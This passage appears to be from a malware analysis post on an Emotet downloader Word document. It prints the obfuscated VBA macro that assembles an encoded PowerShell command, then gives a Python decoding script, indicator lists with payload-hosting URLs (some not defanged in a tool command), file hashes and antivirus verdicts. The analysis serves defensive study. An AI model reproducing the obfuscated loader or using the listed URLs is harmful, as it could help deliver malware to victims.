,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9
   End Function

      Function Zk46e7c8d40(G7b_e54iwh7id_)
         On Error Resume Next
         X8e38jclqayh83g3a6 = CleanString("powe" + "rshe" + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, 
bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, 
bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9)
         Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
         B4ru9eb_hhowd = "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9
         Zk46e7c8d40 = B4ru9eb_hhowd
      End Function
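
The same recovery done statically, as an added Python example that is not code from the original post: it repeats the Split/Join on "g, bq," from Zk46e7c8d40, decodes the -en argument as base64 over UTF-16LE (tolerating a capture that was cut short, as happened with the GUI copy), then merges the quoted string fragments and lists the '*'-separated URLs defanged. The function names, SAMPLE_PS and the .example hosts are constructed for illustration; normalise() is a readability heuristic rather than a PowerShell parser.

```python
import base64
import re

DELIM = "g, bq,"  # junk token seen on the page; the macro removes it with Split/Join

# Constructed stand-in for the decoded script: same string tricks, reserved .example hosts.
SAMPLE_PS = (
    "$junk=(('A'+'bc')+('12'+'z'));"
    "$list=(('ht'+'tp://one.exa')+('mple/a/*htt')+'ps://two.example/b/')"
    '."s`PLIT"([char]42);'
)


def build_constructed_sample(script, chunk=3):
    """Fixture only: lay a script out like the shape's AlternativeText on the page."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    pieces = ["", "l", "l", " ", "-", "e", "n", " "]
    pieces += [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    return "".join(piece + DELIM for piece in pieces)


def strip_junk(text, delim=DELIM):
    """Same effect as the macro's Join(Split(text, delim), "")."""
    return "".join(text.split(delim))


def encoded_argument(cmdline):
    """Return the base64 blob that follows PowerShell's -e/-en/-enc... switch."""
    match = re.search(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]+)", cmdline)
    if match is None:
        raise ValueError("no -EncodedCommand style argument found")
    return match.group(1)


def decode_encoded_command(b64):
    """Decode base64-over-UTF-16LE, tolerating a capture that was cut short."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # bad padding: keep only the complete 4-character groups
        body = b64.rstrip("=")
        raw = base64.b64decode(body[: len(body) // 4 * 4])
    raw = raw[: len(raw) // 2 * 2]  # UTF-16LE needs whole 2-byte units
    return raw.decode("utf-16-le", errors="replace")


def recover_script(alt_text):
    """AlternativeText -> command line -> decoded PowerShell source."""
    cmdline = "powe" + "rshe" + strip_junk(alt_text)  # the macro prepends these halves
    return decode_encoded_command(encoded_argument(cmdline))


def normalise(ps):
    """Readability pass (heuristic, not a PowerShell parser)."""
    ps = ps.replace("`", "")  # assumption: backticks here are noise, not escapes
    previous = None
    while previous != ps:
        previous = ps
        ps = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", ps)  # 'a'+'b' -> 'ab'
        ps = re.sub(r"\(\s*'([^']*)'\s*\)", r"'\1'", ps)           # ('ab')  -> 'ab'
    return ps


def defang(url):
    """Rewrite a URL so it is not clickable: hxxp scheme, [.] in the host."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def download_urls(ps):
    """List URLs in a normalised script, honouring a ."split"([char]N) separator."""
    sep = re.search(r"(?i)split\W*\(\s*\[char\]\s*(\d+)\s*\)", ps)
    sep_char = chr(int(sep.group(1))) if sep else None
    urls = []
    for literal in re.findall(r"'([^']*://[^']*)'", ps):
        parts = literal.split(sep_char) if sep_char else [literal]
        urls.extend(defang(p) for p in parts if "://" in p)
    return urls


if __name__ == "__main__":
    carrier = build_constructed_sample(SAMPLE_PS)
    script = normalise(recover_script(carrier))
    print(script)
    print(download_urls(script))
```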

Artifacts
==========

IOCs
-----
hxxp://haymetetrading[.]com/wp-includes/yGELKj4/
hxxp://simofferbd24[.]com/wp-includes/fsiQc/
hxxp://401kplansinfo[.]com/cgi-bin/KtFRk/
hxxp://fidelityguide[.]com/cgi-bin/VA/
hxxps://sirnakmidyeci[.]com/wp-includes/qk9wW2/
hxxps://subitocarne[.]com/wp-content/ByeOAt9/
hxxps://eliesalibaarchitect[.]com/wordpress/T/

OSINT
-----
http://twitter.com/Cryptolaemus1/status/1308071468815847426
http://pastebin.com/UYbUAeuS – Emotet Epoch 2 IOCs as of 2020-09-21 15:05 US/Eastern

File hashes
-----------
515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 — LRE-090120 JYW-092120.doc

Machinae
--------
machinae 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 http://haymetetrading.com/wp-includes/yGELKj4/ http://simofferbd24.com/wp-includes/fsiQc/ http://401kplansinfo.com/cgi-bin/KtFRk/ http://fidelityguide.com/cgi-bin/VA/ http://sirnakmidyeci.com/wp-includes/qk9wW2/ http://subitocarne.com/wp-content/ByeOAt9/ http://eliesalibaarchitect.com/wordpress/T/

Munin
-----
Online Hash Checker for Virustotal and Other Services
Florian Roth – 0.18.1 July 2019

1 / 1 > Malicious
HASH: 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 COMMENT: LRE-090120 JYW-092120.doc
VIRUS: Microsoft: TrojanDownloader:O97M/Emotet.PEE!MTB / Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen / McAfee: W97M/Downloader.dbv / TrendMicro: Trojan.W97M.EMOTET.TIOIBELH / ESET-NOD32: VBA/TrojanDownloader.Agent.UFY / Symantec: W97M.Downloader / F-Secure: Malware.VBA/Dldr.Agent.boxrg / Sophos: Mal/DocDl-K / GData: VB:Trojan.VBA.Agent.BHR
TYPE: MS Word Document SIZE: 199.12 KB FILENAMES: Price – Sep 21, 2020.doc, Price – Sep 21, 2020.doc
FIRST: 2020-09-21 20:04:15 LAST: 2020-09-22 16:56:49 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 3 USERS: thor, inquest.labs, thor TAGS: OBFUSCATED EXE-PATTERN DOC MACROS ATTACHMENT EXECUTES-DROPPED-FILE HIDE-APP CREATE-OLE

One Comment

  1. Good job!

    I tried to see the “AlternativeText” with LibreOffice on Linux, but this was not possible. Is there a trick to see the string with Didier’s Python Codes?
